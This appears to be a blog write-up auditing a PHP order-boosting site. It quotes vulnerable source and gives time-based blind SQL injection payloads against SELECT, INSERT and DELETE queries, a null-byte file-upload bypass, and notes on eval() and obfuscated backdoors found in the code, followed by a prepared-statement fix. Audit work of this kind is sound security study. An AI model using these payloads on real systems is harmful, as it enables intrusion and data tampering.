0x00 Preface

As we all know, "daishua" (paid order-boosting) sites are very common online these days, so today I am going to do a round of auditing on one such system.

The environment used for this article is PHPStudy + Apache with PHP 5.2.17.

0x01 Main text

  • SQL injection

First, we open Mage's Seay source code audit system. Since SQL injection vulnerabilities are so common, I tend to audit for them first.

However, the SELECT-type injection findings it reports here seem incomplete, so this time I plan to dig for bugs by tracing sensitive functions instead.



Here is a likely SQL injection. Let's click into it.

```php
elseif ($my == 'edit_submit') {
    $cid  = $_GET['cid'];   // taken straight from the query string, no filtering
    $rows = $DB->get_row('select * from shua_class where cid=\'' . $cid . '\' limit 1');
    if (!$rows) {
        exit('<script language=\'javascript\'>alert(\'Current record does not exist!\'); history.go(-1);</script>');
    }
```

Here is the hole: the `cid` variable is passed straight into the SQL statement without any filtering. Because `$DB->get_row()` only tells us whether a matching row exists (nothing from the result is echoed back), the injection can only be confirmed blind, for example by timing.

Request used:

```
/admin/classlist.php?my=edit_submit&cid=1' and sleep(10)--+
```

Continuing through the same file:

```php
if ($my == 'add_submit') {
    $name = $_POST['name'];
    if ($name == NULL) {
        exit('<script language=\'javascript\'>alert(\'Save error, please make sure nothing is empty!\'); history.go(-1);</script>');
    } else {
        // $name is concatenated straight into the INSERT statement
        $sql = 'insert into `shua_class` (`name`,`active`) values (\'' . $name . '\',\'1\')';
```

When `$name` is not null it is concatenated into the INSERT statement, giving an INSERT-type SQL injection.

As in the screenshot above:

POST body:

```
name=yanxia'+or+sleep(10),'1')%23
```

Okay, keep scrolling down and we find a DELETE-type SQL injection:

```php
elseif ($my == 'delete') {
    $cid = $_GET['cid'];   // again unfiltered
    $sql = 'DELETE FROM shua_class WHERE cid=\'' . $cid . '\'';
    if ($DB->query($sql)) {
        exit('<script language=\'javascript\'>alert(\'Deleted successfully!\'); window.location.href=\'classlist.php\';</script>');
    } else {
        exit('<script language=\'javascript\'>alert(\'Deletion failed! ' . $DB->error() . '\'); history.go(-1);</script>');
    }
```

Request used:

```
admin/classlist.php?my=delete&cid=1' and sleep(10)--+
```

(Similar SQL injections exist elsewhere; I won't list them all.)
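As an added example (not code from the audited system), here is how the `edit_submit` and `delete` branches above can be hardened: `cid` is validated as a positive integer and then bound as a parameter of a PDO prepared statement, so the `sleep(10)` payloads shown earlier are rejected before any SQL is built. `$pdo`, the connection settings and the helper names are assumptions; the project's own `$DB` wrapper is not shown on the page, so it is not used here.

```php
<?php
// Added example (not the project's code): the edit_submit / delete branches of
// admin/classlist.php rewritten so cid is validated and bound as a parameter.
// $pdo and the connection settings are assumptions; the project's own $DB
// wrapper is not used because its interface is not shown on the page.
function connect_db()
{
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=shua', 'user', 'pass'); // constructed settings
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares
    return $pdo;
}
// cid is a primary key: accept only a positive integer. A value such as
// "1' and sleep(10)--+" is rejected here before any SQL is built.
function parse_cid($raw)
{
    $cid = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    return ($cid === false) ? null : $cid;
}
function fetch_class(PDO $pdo, $cid)
{
    // The value is bound as a parameter, never concatenated into the query text.
    $stmt = $pdo->prepare('SELECT * FROM shua_class WHERE cid = :cid LIMIT 1');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row === false) ? null : $row;
}
function delete_class(PDO $pdo, $cid)
{
    $stmt = $pdo->prepare('DELETE FROM shua_class WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount(); // rows actually removed
}
// Dispatch as in classlist.php, with the validation in front of both branches.
$my  = isset($_GET['my']) ? $_GET['my'] : '';
$cid = parse_cid(isset($_GET['cid']) ? $_GET['cid'] : '');
if ($cid === null) {
    exit('Invalid cid');
}
$pdo = connect_db();
if ($my === 'edit_submit') {
    if (!fetch_class($pdo, $cid)) {
        exit('Current record does not exist!');
    }
} elseif ($my === 'delete') {
    echo delete_class($pdo, $cid) ? 'Deleted successfully!' : 'Deletion failed!';
}
```

PDO, `PDO::ATTR_EMULATE_PREPARES` and `filter_var()` are all available on the PHP 5.2.17 build used in this article, so the same fix applies to the INSERT branch by binding `$name` with `PDO::PARAM_STR`.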

  • File upload

For this one, I start by locating the file upload point.

Opening admin/shopedit.php?my=add, I find a file upload form.



Let's open the source and look at the logic:

```php
case 'uploadimg':
    if ($_POST['do'] == 'upload') {
        $type     = $_POST['type'];   // user-controlled prefix of the file name
        $filename = $type . '_' . md5_file($_FILES['file']['tmp_name']) . '.png';
        $fileurl  = 'assets/img/Product/' . $filename;
        if (copy($_FILES['file']['tmp_name'], ROOT . 'assets/img/Product/' . $filename)) {
            exit('{"code":0,"msg":"succ","url":"' . $fileurl . '"}');
        } else {
            exit('{"code":1,"msg":"Upload failed, please make sure the local directory is writable"}');
        }
    }
    exit('{"code":-1,"msg":"null"}');
    break;
```

Notice that the file name is built from md5_file($_FILES['file']['tmp_name']) (an MD5 hash of the content, not encryption), so there is nothing to work with in the uploaded file's name or its tmp_name. However, the `$type` variable is entirely under the user's control, and on this PHP 5.2.17 build a null byte in it truncates the path, so the `.png` suffix is never applied. The steps are shown below.





The response says .jpg, but the name was actually truncated. Let's open the directory and check.



  • Backdoor

I noticed this while using the automatic audit feature: a 404 page contains eval(), which most likely means the author left a backdoor behind.



Checking it confirms this.

Next I want to see whether there is any other code execution. Common sensitive functions include eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), array_map(), and so on.

Here comes the highlight. Searching for preg_replace turned up the following:





Oh, no mistake about it. Is this a backdoor?

It turns out to be obfuscated with gzinflate(base64_decode()). Let's decode and dump its source to see:





0x02 Conclusion

That’s the end of this article.

Code auditing is fun, but it is hard to make progress without doing it yourself! Keep at it with me, everyone.

  • Posted at 2021-07-20 18:12:28

  • Views: 2886

  • Category: Vulnerability analysis